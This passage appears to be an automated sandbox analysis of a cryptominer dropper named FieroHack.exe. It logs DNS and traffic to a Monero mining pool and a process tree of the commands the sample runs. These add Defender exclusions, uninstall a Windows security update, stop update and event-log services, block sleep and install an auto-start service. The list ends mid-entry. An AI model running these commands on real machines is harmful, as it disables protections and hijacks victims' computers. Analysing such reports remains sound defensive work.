Jun 30, 2024 01:37:26.804265022 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:33.545761108 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:37:33.601238966 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:43.572747946 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:37:43.616813898 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:38:03.617125988 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:38:03.663722992 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:38:06.162776947 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:38:06.168212891 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:38:06.371553898 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:38:06.413737059 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 30, 2024 01:34:52.402369022 CEST | 57509 | 53 | 192.168.2.4 | 1.1.1.1
Jun 30, 2024 01:34:52.409014940 CEST | 53 | 57509 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 30, 2024 01:34:52.402369022 CEST | 192.168.2.4 | 1.1.1.1 | 0x1141 | Standard query (0) | pool.supportxmr.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 30, 2024 01:34:52.409014940 CEST | 1.1.1.1 | 192.168.2.4 | 0x1141 | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 30, 2024 01:34:52.409014940 CEST | 1.1.1.1 | 192.168.2.4 | 0x1141 | No error (0) | pool-fr.supportxmr.com | | 141.94.96.195 | A (IP address) | IN (0x0001) | false
Jun 30, 2024 01:34:52.409014940 CEST | 1.1.1.1 | 192.168.2.4 | 0x1141 | No error (0) | pool-fr.supportxmr.com | | 141.94.96.71 | A (IP address) | IN (0x0001) | false
Jun 30, 2024 01:34:52.409014940 CEST | 1.1.1.1 | 192.168.2.4 | 0x1141 | No error (0) | pool-fr.supportxmr.com | | 141.94.96.144 | A (IP address) | IN (0x0001) | false

                                                  Target ID:0
                                                  Start time:19:33:56
                                                  Start date:29/06/2024
                                                  Path:C:\Users\user\Desktop\FieroHack.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\FieroHack.exe"
                                                  Imagebase:0x400000
                                                  File size:6'603'296 bytes
                                                  MD5 hash:B88F61A7938EF8AF011259C59EFC3D3D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:19:34:16
                                                  Start date:29/06/2024
                                                  Path:C:\Users\user\AppData\Roaming\WeMod.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\AppData\Roaming\WeMod.exe
                                                  Imagebase:0x7ff617660000
                                                  File size:718'354'208 bytes
                                                  MD5 hash:6A2D1FD5BA3F75656E23FEEF98269C17
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:19:34:16
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:19:34:16
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:19:34:26
                                                  Start date:29/06/2024
                                                  Path:C:\Users\user\AppData\Roaming\Sirus.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\Sirus.exe
                                                  Imagebase:0x2f0000
                                                  File size:802'664'960 bytes
                                                  MD5 hash:35161C329ACE0D7440101EEBBE9BF7A4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff74f1c0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\wusa.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff686f80000
                                                  File size:345'088 bytes
                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:19:34:22
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                  Imagebase:0x7ff78bb80000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                  Imagebase:0x7ff78bb80000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                  Imagebase:0x7ff78bb80000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  Imagebase:0x7ff78bb80000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe delete "BFFESVJT"
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:19:34:23
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:19:34:24
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:32
                                                  Start time:19:34:24
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto"
                                                  Imagebase:0x7ff7c7a30000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:33
                                                  Start time:19:34:24
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:19:34:26
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:19:34:27
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                  Imagebase:0x7ff6eef20000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:19:34:42
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\svchost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                  Imagebase:0x7ff6eef20000
                                                  File size:55'320 bytes
                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:37
                                                  Start time:19:34:44
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:19:34:44
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe start "BFFESVJT"
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WeMod.exe"
                                                  Imagebase:0x7ff77ec80000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:41
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:43
                                                  Start time:19:34:47
                                                  Start date:29/06/2024
                                                  Path:C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
                                                  Imagebase:0x7ff6ee0a0000
                                                  File size:718'354'208 bytes
                                                  MD5 hash:6A2D1FD5BA3F75656E23FEEF98269C17
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:19:34:45
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\choice.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:choice /C Y /N /D Y /T 3
                                                  Imagebase:0x7ff6c3b30000
                                                  File size:35'840 bytes
                                                  MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:45
                                                  Start time:19:34:48
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                  Imagebase:0x7ff726ad0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:19:34:48
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:47
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff77ec80000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:48
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:49
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:50
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:51
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\wusa.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff7ab630000
                                                  File size:345'088 bytes
                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:52
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:53
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:54
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:55
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:56
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                  Imagebase:0x7ff760ad0000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:57
                                                  Start time:19:34:50
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
